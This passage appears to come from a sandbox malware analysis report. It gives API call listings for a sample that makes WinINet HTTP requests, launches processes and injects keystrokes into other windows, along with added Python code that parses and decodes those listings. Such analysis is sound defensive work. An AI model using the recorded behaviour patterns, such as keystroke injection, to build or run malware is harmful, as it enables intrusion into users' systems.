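            call.message = find_message(args)
        calls.append(call)
    return calls


def summarize(text: str = REPORT_LINES) -> List[str]:
    """One line per call, e.g. '00519014 SendMessageW LB_SELECTSTRING'."""
    out = []
    for c in parse_api_lines(text):
        msg = f" {c.message[1]}" if c.message else ""
        out.append(f"{c.ref:08X} {c.api}{msg}")
    return out


if __name__ == "__main__":
    for line in summarize():
        print(line)
```

Note the slot index returned by find_message: in the second SendMessageW line the 0x0111 (WM_COMMAND) value is rendered in slot 2, one position away from its nominal Msg slot, because the sandbox reads argument values from stack slots at the call site. Treat the argument columns in these listings as approximate and confirm against the disassembly before relying on a specific wParam/lParam value.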
                                                                                                                      APIs
                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00527A6C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1725837607-0
                                                                                                                      • Opcode ID: 510e4391d68fcb0bb2612d9c24a4db20915871be373137726dc203ef47346b29
                                                                                                                      • Instruction ID: aefd558a2cdd191b75b76da40022f54f56193356063023e49aa90ce5a00bdc28
                                                                                                                      • Opcode Fuzzy Hash: 510e4391d68fcb0bb2612d9c24a4db20915871be373137726dc203ef47346b29
                                                                                                                      • Instruction Fuzzy Hash: C2B17C7590822A9FDB00DFA5E885BBEBBB4FF4A325F204429E511E7281D734AD41CB90
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004CFAA6
                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 004CFB45
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 004CFC9C
                                                                                                                      • DestroyWindow.USER32(?), ref: 005045D6
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0050463B
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00504668
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                      • Opcode ID: 3f614f97ce0e0ebae4f7fb21aa069aa39a2f3243b320d8218c9ab4478ee9bfef
                                                                                                                      • Instruction ID: 7f59e8706e499378556ef8873a9ab5b8f95a83f3407a7c7ebf45ac64c920e69e
                                                                                                                      • Opcode Fuzzy Hash: 3f614f97ce0e0ebae4f7fb21aa069aa39a2f3243b320d8218c9ab4478ee9bfef
                                                                                                                      • Instruction Fuzzy Hash: 2DA18C743012128FCB68EF15C594F6DFB65BF05704F1042AEE90AAB2A1DB39AC5ACF54
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                      • String ID: ,,U$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 2862541840-1719318110
                                                                                                                      • Opcode ID: daf4c5d73bb19af010222c05ec1b58d95496af774fd9f71154b4ea9ac6c6511e
                                                                                                                      • Instruction ID: 5549f3dd5c55d09955d61c50f6f323d2351f513c2e77ebe9edd0258e41a06fef
                                                                                                                      • Opcode Fuzzy Hash: daf4c5d73bb19af010222c05ec1b58d95496af774fd9f71154b4ea9ac6c6511e
                                                                                                                      • Instruction Fuzzy Hash: 1A9190B1A00219ABDF24DFA5C848FAFBBB8FF45714F108559F915AB280D7B09944CFA0
                                                                                                                      APIs
                                                                                                                      • EnumChildWindows.USER32(?,0051A439), ref: 0051A377
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                      • Opcode ID: d9e466b0033a62007ed18fca2e37bae63ae1c09686f184730d383ad627546d58
                                                                                                                      • Instruction ID: 967b4dc5e6de9c0fcfa5b68fea9383f5a73184919ed3aefcb79d506b2ecb1466
                                                                                                                      • Opcode Fuzzy Hash: d9e466b0033a62007ed18fca2e37bae63ae1c09686f184730d383ad627546d58
                                                                                                                      • Instruction Fuzzy Hash: 6991E734601609ABEB09DFA1C441BEDFFB4BF04304F54852ED869A3241DF346AD9DB95
                                                                                                                      APIs
                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 004C2EAE
                                                                                                                        • Part of subcall function 004C1DB3: GetClientRect.USER32(?,?), ref: 004C1DDC
                                                                                                                        • Part of subcall function 004C1DB3: GetWindowRect.USER32(?,?), ref: 004C1E1D
                                                                                                                        • Part of subcall function 004C1DB3: ScreenToClient.USER32(?,?), ref: 004C1E45
                                                                                                                      • GetDC.USER32 ref: 004FCD32
                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004FCD45
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004FCD53
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004FCD68
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 004FCD70
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004FCDFB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                      • Opcode ID: e81d1b59b16711c59c082e13d1f2e21ea4c2bdd68b74006648321e04f05f8b32
                                                                                                                      • Instruction ID: 84f48fa2aedaadb36f400569eff97c141f80717d6c1c64c0e486f87024eafd7b
                                                                                                                      • Opcode Fuzzy Hash: e81d1b59b16711c59c082e13d1f2e21ea4c2bdd68b74006648321e04f05f8b32
                                                                                                                      • Instruction Fuzzy Hash: BA71DD3440020DDFCF258F64CA84AFB3BB5FF49324F14426BEE55AA2A6D7788841DB65
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00531A50
                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00531A7C
                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00531ABE
                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00531AD3
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00531AE0
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00531B10
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00531B57
                                                                                                                        • Part of subcall function 00532483: GetLastError.KERNEL32(?,?,00531817,00000000,00000000,00000001), ref: 00532498
                                                                                                                        • Part of subcall function 00532483: SetEvent.KERNEL32(?,?,00531817,00000000,00000000,00000001), ref: 005324AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2603140658-3916222277
                                                                                                                      • Opcode ID: 8ca8e05013ad8cc693e2f418d484de30fc91108575406156dce4360752a41585
                                                                                                                      • Instruction ID: 9c4d970f14f5f9cad98e60f5f23027740ff8e0e14415819a94769a0854e0bb38
                                                                                                                      • Opcode Fuzzy Hash: 8ca8e05013ad8cc693e2f418d484de30fc91108575406156dce4360752a41585
                                                                                                                      • Instruction Fuzzy Hash: 7241AFB5501609BFEB128F64CC99FFBBBACFF09354F00412AF9059A141EB749E449BA4
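                                                                                                                      The per-function API listings in this report (the WinINet entry above, or the PostMessageW/MapVirtualKeyW entry further down the page) are the most useful part for triage, but every constant is shown as a raw immediate. The following is an added example, not part of the Joe Sandbox report and not AutoIt runtime code: a parser for the "• Name.MODULE(args), ref: ADDR" lines, including the "Part of subcall function" prefix, with a decoder for the few constants that recur in this sample's entries. The only symbolic names it assigns are the documented Win32 values for WM_GETFONT (0x31), WM_SETICON (0x80), WM_KEYDOWN/WM_KEYUP (0x100/0x101), VK_LEFT/VK_RIGHT (0x25/0x27), INTERNET_OPTION_SECURITY_FLAGS (0x1F) and HTTP_QUERY_CONTENT_LENGTH (5); everything else stays raw. The sample input is constructed from lines in this report.

```python
"""Parse Joe Sandbox per-function API listings and name a few Win32 constants.

Added example, not part of the Joe Sandbox report. The constant tables hold
only documented Win32 values; SAMPLE is constructed from lines in the report.
"""
import re
from dataclasses import dataclass
from typing import Optional

# One call line: "• Name.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function XXXXXXXX:" when the call belongs to a callee.
# Args are optional ("• GetDC.USER32 ref: 004FCD32" has none).
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Documented Win32 values only (winuser.h, wininet.h).
WINDOW_MSGS = {0x31: "WM_GETFONT", 0x80: "WM_SETICON",
               0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}
VIRTUAL_KEYS = {0x25: "VK_LEFT", 0x27: "VK_RIGHT"}
INET_OPTIONS = {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list              # int for an immediate, None for "?" (unresolved)
    ref: int                # address of the call site
    caller: Optional[int]   # subcall function address, if any


def parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_api_listing(text: str) -> list:
    """Return the ApiCall records in a block of report text, in order."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # "APIs" header or any other non-call line
        raw = m.group("args")
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        caller = int(m.group("caller"), 16) if m.group("caller") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), caller))
    return calls


def decode(call: ApiCall) -> dict:
    """Map argument index -> symbolic name for the immediates we can name."""
    names = {}

    def tag(idx, table):
        if idx < len(call.args) and call.args[idx] in table:
            names[idx] = table[call.args[idx]]

    if call.name in ("SendMessageW", "PostMessageW"):
        tag(1, WINDOW_MSGS)                      # Msg
        if names.get(1) in ("WM_KEYDOWN", "WM_KEYUP"):
            tag(2, VIRTUAL_KEYS)                 # wParam is the virtual key
    elif call.name == "MapVirtualKeyW":
        tag(0, VIRTUAL_KEYS)                     # uCode
    elif call.name in ("InternetQueryOptionW", "InternetSetOptionW"):
        tag(1, INET_OPTIONS)                     # dwOption
    elif call.name == "HttpQueryInfoW":
        tag(1, HTTP_QUERY)                       # dwInfoLevel
    return names


def synthetic_keystrokes(calls: list) -> tuple:
    """(attaches_thread_input, [(msg, key), ...]) for key messages posted or
    sent to a window: the pattern behind scripted input into another window."""
    attached = any(c.name == "AttachThreadInput" for c in calls)
    keys = []
    for c in calls:
        d = decode(c)
        if c.name in ("PostMessageW", "SendMessageW") and d.get(1) in ("WM_KEYDOWN", "WM_KEYUP"):
            keys.append((d[1], d.get(2, "unknown")))
    return attached, keys


# Constructed from lines in this report (WinINet entry and keystroke entry).
SAMPLE = """APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00531A50
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00531ABE
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00531B10
• GetDC.USER32 ref: 004FCD32
  • Part of subcall function 0051A82C: AttachThreadInput.USER32(00000000,?,00519683,?,00000001), ref: 0051A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0051968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005196AB
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005196F8
"""

if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.name}.{c.module} {decode(c)}")
    print(synthetic_keystrokes(parsed))
```

                                                                                                                      Two caveats when reading the decoded output: a "?" is an argument the IDA plugin could not resolve statically, and only scalar arguments should be named this way. The third argument of InternetSetOptionW, for instance, is a pointer to the option buffer, so the 00000100 shown in the entry above is not itself a security flag value; the flag bits live in the buffer that InternetQueryOptionW filled.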
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0054F910), ref: 00538D28
                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0054F910), ref: 00538D5C
                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00538ED6
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00538F00
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 560350794-0
                                                                                                                      • Opcode ID: 93a425b524cce8502400f5daba861cf31c735f78c6858d7df15b014770196124
                                                                                                                      • Instruction ID: d2556839872f0656be825e7301b3bcd2ebb3f6672a4087e399b5e94c718d0645
                                                                                                                      • Opcode Fuzzy Hash: 93a425b524cce8502400f5daba861cf31c735f78c6858d7df15b014770196124
                                                                                                                      • Instruction Fuzzy Hash: 2AF12875A00209EFDF08DF94C888EAEBBB9FF45314F108498F915AB251DB71AE45DB90
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0053F6B5
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0053F848
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0053F86C
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0053F8AC
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0053F8CE
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0053FA4A
                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0053FA7C
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0053FAAB
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0053FB22
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4090791747-0
                                                                                                                      • Opcode ID: 0873230621427b06ca1586921233a77af4278df72b3c1ce1490379dc92a3a53f
                                                                                                                      • Instruction ID: a6cbb07689b743e241c76eaeeac891137cfe527a27bf5408e6b35c508c1a2cb9
                                                                                                                      • Opcode Fuzzy Hash: 0873230621427b06ca1586921233a77af4278df72b3c1ce1490379dc92a3a53f
                                                                                                                      • Instruction Fuzzy Hash: FDE1E435604341AFDB14EF25C895B6ABBE1FF85318F14886EF8958B2A1CB34EC45CB52
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0052466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00523697,?), ref: 0052468B
                                                                                                                        • Part of subcall function 0052466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00523697,?), ref: 005246A4
                                                                                                                        • Part of subcall function 00524A31: GetFileAttributesW.KERNEL32(?,0052370B), ref: 00524A32
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00524D40
                                                                                                                      • _wcscmp.LIBCMT ref: 00524D5A
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00524D75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 793581249-0
                                                                                                                      • Opcode ID: 5c5e7a18ab3e69a86c74ec87e3a014c0905121a7ba07943bd6cec3edbe875507
                                                                                                                      • Instruction ID: 2dead03a00c2a2fe926e0188ee34719b33c323e174dc1f4d642dae1c73ad8550
                                                                                                                      • Opcode Fuzzy Hash: 5c5e7a18ab3e69a86c74ec87e3a014c0905121a7ba07943bd6cec3edbe875507
                                                                                                                      • Instruction Fuzzy Hash: 685161B20083959BC724DB61D881DDF77ECAF85345F40092FB289C3191EF74A188CB6A
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 005486FF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 634782764-0
                                                                                                                      • Opcode ID: 4c72c48b6d6043e182f0700e75621dc6e0bbe0cdd3fda6bb6190307ab139e730
                                                                                                                      • Instruction ID: e54a01dc1deedaa589f8eba70a5daf518c20de37f0181cb991c81df9691521f4
                                                                                                                      • Opcode Fuzzy Hash: 4c72c48b6d6043e182f0700e75621dc6e0bbe0cdd3fda6bb6190307ab139e730
                                                                                                                      • Instruction Fuzzy Hash: 1551AF34500204BEEB609B288C89FFD7FA4FB1576CF604516F915E62A1DFB2A980EB40
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 004FC2F7
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004FC319
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004FC331
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 004FC34F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004FC370
                                                                                                                      • DestroyIcon.USER32(00000000), ref: 004FC37F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004FC39C
                                                                                                                      • DestroyIcon.USER32(?), ref: 004FC3AB
                                                                                                                        • Part of subcall function 0054A4AF: DeleteObject.GDI32(00000000), ref: 0054A4E8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2819616528-0
                                                                                                                      • Opcode ID: 402b1b7d667c03fc6e9aadd062f208ffb62f94a555159985b50c0d4c46688f3d
                                                                                                                      • Instruction ID: 9a84f5de48ac95ce5840baab5530f4996b1a3279922641270fd4513080ec9d23
                                                                                                                      • Opcode Fuzzy Hash: 402b1b7d667c03fc6e9aadd062f208ffb62f94a555159985b50c0d4c46688f3d
                                                                                                                      • Instruction Fuzzy Hash: 30518C78A00209AFDB24DF24CD85FAB3BB5FB54354F10452EF902A7290EBB4AD51EB54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0051A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0051A84C
                                                                                                                        • Part of subcall function 0051A82C: GetCurrentThreadId.KERNEL32 ref: 0051A853
                                                                                                                        • Part of subcall function 0051A82C: AttachThreadInput.USER32(00000000,?,00519683,?,00000001), ref: 0051A85A
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0051968E
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005196AB
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 005196AE
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 005196B7
                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005196D5
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005196D8
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 005196E1
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005196F8
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005196FB
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      • Opcode ID: f4d3b5e0e231b75d93338a011f21a1345299a99f52bdc2c5991a2a6736f6b2f4
                                                                                                                      • Instruction ID: c92de8733d9e94ba493f6162161f2c448e0d740163f33275fd168210a508fcdf
